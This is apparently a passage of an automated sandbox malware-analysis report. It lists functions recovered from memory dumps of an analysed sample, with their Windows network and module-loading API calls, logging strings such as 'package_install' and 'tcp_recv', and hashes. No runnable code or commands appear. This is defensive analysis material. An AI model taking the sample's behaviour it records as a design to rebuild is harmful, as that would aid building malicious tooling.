Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 521feb20a72a957341fc0d264e623fa141536e4afba6e477ef33c19f24a5c93d
Instruction ID: a3219e75c2f0d140f77c1dda8ebfe1df20678e8ed788155648b15d20e9eac923
Opcode Fuzzy Hash: 521feb20a72a957341fc0d264e623fa141536e4afba6e477ef33c19f24a5c93d
Instruction Fuzzy Hash: 3411515BB0E64B91EA62EF15AC7177412516F06FA0F450330ED2D8ABE3EE1CA556C308

Function 00007FFDAC0F479A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFDAC0F47C2
WSAGetLastError.WS2_32 ref: 00007FFDAC0F47DC

Strings

tcp_recv, xrefs: 00007FFDAC0F47F6, 00007FFDAC0F480E, 00007FFDAC0F4833
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFDAC0F4815
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDAC0F47FD
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDAC0F483A

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 1d774439edd380124319bd35bc897312daaeb92d8d859f87963e7a2f94a6acba
Instruction ID: c3256406b72be44dd41405001f4458a52657d8822f7e335e647e1671be9213d1
Opcode Fuzzy Hash: 1d774439edd380124319bd35bc897312daaeb92d8d859f87963e7a2f94a6acba
Instruction Fuzzy Hash: 91119D65F1FA0781F9115358AC602781210AF01BF0F848334DC2D46BE3DF5CE6A6A78C

Function 00007FFDA5BA2ECA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFDA5BA2EF2
WSAGetLastError.WS2_32 ref: 00007FFDA5BA2F0C

Strings

[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA5BA2F2D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFDA5BA2F45
tcp_recv, xrefs: 00007FFDA5BA2F26, 00007FFDA5BA2F3E, 00007FFDA5BA2F63
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDA5BA2F6A

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 2ae2a37e5c8560215958916f0623df1cdd246532887d3322c8678fbb21397952
Instruction ID: d514d1b62eac2c7f269201ee0579e96c170407bbee980470d772564ceed7dfcc
Opcode Fuzzy Hash: 2ae2a37e5c8560215958916f0623df1cdd246532887d3322c8678fbb21397952
Instruction Fuzzy Hash: 51116050F0F90F56E9205314A8707755250AF07FB6F414730FE2D86BE3EE9EA6468308

Function 00007FFDAC121C0A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFDAC121C32
WSAGetLastError.WS2_32 ref: 00007FFDAC121C4C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDAC121CAA
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDAC121C6D
tcp_recv, xrefs: 00007FFDAC121C66, 00007FFDAC121C7E, 00007FFDAC121CA3
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFDAC121C85

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 50f16c7df9a271bab7e1408e5b350b4adededf4a6de90b992999d4deae4ad3df
Instruction ID: 1f5aae756c821ccf76ba3f1afed0513234d68e88259baf03a829c6e6f496087a
Opcode Fuzzy Hash: 50f16c7df9a271bab7e1408e5b350b4adededf4a6de90b992999d4deae4ad3df
Instruction Fuzzy Hash: C811C45EF0EA1781F652A315E9603751640AF90BF8F601330DC2DA63E7DE1CE9228309

Function 00007FF70CAD2304 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,service,0000021B15D113D0,00007FF70CAD2910), ref: 00007FF70CAD2312

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

GetLastError.KERNEL32(?,?,service,0000021B15D113D0,00007FF70CAD2910), ref: 00007FF70CAD233E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF70CAD2351
module_load, xrefs: 00007FF70CAD2326, 00007FF70CAD234A
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF70CAD232D
service, xrefs: 00007FF70CAD2305

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
API String ID: 4085810780-4145076245
Opcode ID: bc55f70a68f1556e1ac72ef136052a39d6f875aa833af2b46a59c11ba6540690
Instruction ID: 03f2490e52d3d46b8c8fa0440fc4902b05817480d86e5b4d4131cd011e1dd34f
Opcode Fuzzy Hash: bc55f70a68f1556e1ac72ef136052a39d6f875aa833af2b46a59c11ba6540690
Instruction Fuzzy Hash: 7FF0BEE0A0A60780ED25B75AFC40EF4A6106F44B8CFC80131CC0E16754EF9CA982D330

Function 00007FFDA55AB87E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFDA55AB890

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFDA55AB8CF
net_init, xrefs: 00007FFDA55AB8A1, 00007FFDA55AB8C5
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55AB8E4
Done, xrefs: 00007FFDA55AB89A
[I] (%s) -> %s, xrefs: 00007FFDA55AB8A8

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 62bc97c156583ed3092e0c20d54691acc908191e9a6b411faf57dda8f543264a
Instruction ID: b4933eb3d1a17486517e2258d081ce9568be4b1aa033e7a4d7f295f1fa526114
Opcode Fuzzy Hash: 62bc97c156583ed3092e0c20d54691acc908191e9a6b411faf57dda8f543264a
Instruction Fuzzy Hash: 77F0F968B0A40F92FB129F14E8787F92210AF13B94F850436D50D4A3E3EE9DE5498788

Function 00007FFDA55D296E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFDA55D2980

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[I] (%s) -> %s, xrefs: 00007FFDA55D2998
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFDA55D29BF
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55D29D4
Done, xrefs: 00007FFDA55D298A
net_init, xrefs: 00007FFDA55D2991, 00007FFDA55D29B5

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: d189043dadf752719bc2fa3d3bc584d33221fa5f7df56ee74483cc14220b494d
Instruction ID: ee7c9a56dfed95d65701da21eed02428b685356ef3a366309369b9f26ea0eaa2
Opcode Fuzzy Hash: d189043dadf752719bc2fa3d3bc584d33221fa5f7df56ee74483cc14220b494d
Instruction Fuzzy Hash: 05F049ABB0A64A91FB12DF10E8653F41261AF1AB84F890432D80D86397AE1CE5998308

Function 00007FFDAC0F4B5E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFDAC0F4B70

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC0F4BC4
net_init, xrefs: 00007FFDAC0F4B81, 00007FFDAC0F4BA5
[I] (%s) -> %s, xrefs: 00007FFDAC0F4B88
Done, xrefs: 00007FFDAC0F4B7A
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFDAC0F4BAF

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 797258fad69575a73319076e18fe1457beafa678687e9360524f82ac39dcacd9
Instruction ID: c26f692039c5e7e46ac3cdfad11364b9a4990a7cf85182e2015aa363a957e347
Opcode Fuzzy Hash: 797258fad69575a73319076e18fe1457beafa678687e9360524f82ac39dcacd9
Instruction Fuzzy Hash: F7F09062B0F80391FB12DB18EC653F41211AF107E8F880036D80D46793EF5CE699974C

Function 00007FFDA55762AE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFDA55762C0

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

[I] (%s) -> %s, xrefs: 00007FFDA55762D8
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5576314
net_init, xrefs: 00007FFDA55762D1, 00007FFDA55762F5
Done, xrefs: 00007FFDA55762CA
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFDA55762FF

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 01985655090be95bd34bcc5fbd411f4ff69008fd546008f15c08217f8511f44b
Instruction ID: 5d65d7f3907e5a0a78a45ae16ed9300b4128a36cc28b383317aac6ab457a276b
Opcode Fuzzy Hash: 01985655090be95bd34bcc5fbd411f4ff69008fd546008f15c08217f8511f44b
Instruction Fuzzy Hash: 40F04F68B0F41FD1FB129F10E8243F412506F22B40F800436D80D4A397AE5DE5589708

Function 00007FFDA5BA328E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFDA5BA32A0

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

Done, xrefs: 00007FFDA5BA32AA
[I] (%s) -> %s, xrefs: 00007FFDA5BA32B8
net_init, xrefs: 00007FFDA5BA32B1, 00007FFDA5BA32D5
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5BA32F4
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFDA5BA32DF

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 18599bda2ad098d9ecc36d45987f38cc39e5643c099abb5fd0b996352f0ed049
Instruction ID: 7381a72130adbdd1736c611ea6e5491d8188a72fb267e40187707b3578ad785c
Opcode Fuzzy Hash: 18599bda2ad098d9ecc36d45987f38cc39e5643c099abb5fd0b996352f0ed049
Instruction Fuzzy Hash: A9F06260F0A50F82FF109714E4213FA13506F12B82F454432D90E467E7EE9EF649C308

Function 00007FFDAC121FCE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFDAC121FE0

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

Done, xrefs: 00007FFDAC121FEA
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFDAC12201F
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC122034
[I] (%s) -> %s, xrefs: 00007FFDAC121FF8
net_init, xrefs: 00007FFDAC121FF1, 00007FFDAC122015

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 9a9980137d6a4ad6aac249e6250886b577c6bb601ad2ab04030cb3d182ef5364
Instruction ID: 536b1c9c4aac0a34ef71253ca15616bb6b283a669353521f670a0eb2fbad4b10
Opcode Fuzzy Hash: 9a9980137d6a4ad6aac249e6250886b577c6bb601ad2ab04030cb3d182ef5364
Instruction Fuzzy Hash: DDF090A7F1A847C1FB539711E8283F61690AFA57E8F440032C84D463A7EE1CE649CB49

Function 00007FF70CAD14EF Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70CAD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD1FEE

_mbscpy.MSVCRT ref: 00007FF70CAD155C

Part of subcall function 00007FF70CAD13CD: strlen.MSVCRT ref: 00007FF70CAD13D8
Part of subcall function 00007FF70CAD13CD: strlen.MSVCRT ref: 00007FF70CAD13F4
Part of subcall function 00007FF70CAD13CD: strlen.MSVCRT ref: 00007FF70CAD1400

Strings

package_install, xrefs: 00007FF70CAD158E, 00007FF70CAD15FE
service, xrefs: 00007FF70CAD14F0
[I] (%s) -> Done(pkg_path=%s,tgt_path=%s), xrefs: 00007FF70CAD1605
[E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x), xrefs: 00007FF70CAD1595

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: strlen$HandleModule_mbscpy
String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
API String ID: 3656010895-1379287937
Opcode ID: 999f462e853b377e48d0abd04af6c90689e3eae28469ba59c3687f2a7c353423
Instruction ID: d13614046ca46816d36cf168c1df4afa3b76afe702df8032afd96c0d3e7e2f36
Opcode Fuzzy Hash: 999f462e853b377e48d0abd04af6c90689e3eae28469ba59c3687f2a7c353423
Instruction Fuzzy Hash: E53150A2A18A8791EB10AB54FC907E9A361EF84354FC01532E74F4768DDF6DD909C790

Function 00007FFDA55ABBE3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDA55ABC03

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

GetLastError.KERNEL32 ref: 00007FFDA55ABC36

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFDA55ABC23
module_get_proc, xrefs: 00007FFDA55ABC1C, 00007FFDA55ABC46
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFDA55ABC4D

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: da492238ef1817226800074fda20234807e6668643ef1cd1465af84d33c768e5
Instruction ID: ebf96167163855222a2d333698530f2efe8eb7c71668955984f7e54a22dbeff2
Opcode Fuzzy Hash: da492238ef1817226800074fda20234807e6668643ef1cd1465af84d33c768e5
Instruction Fuzzy Hash: 0AF08F98B0A74F52FA134F05A8387A552516F06FE4F844531DD4C07B96EE2D96468308

Function 00007FFDA55D4D73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDA55D4D93

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

GetLastError.KERNEL32 ref: 00007FFDA55D4DC6

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFDA55D4DB3
module_get_proc, xrefs: 00007FFDA55D4DAC, 00007FFDA55D4DD6
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFDA55D4DDD

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
